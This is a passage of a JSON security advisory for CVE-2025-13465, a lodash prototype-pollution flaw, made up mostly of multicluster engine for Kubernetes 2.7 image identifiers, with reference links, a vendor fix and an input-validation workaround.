"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:23:47+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.12/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5636"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
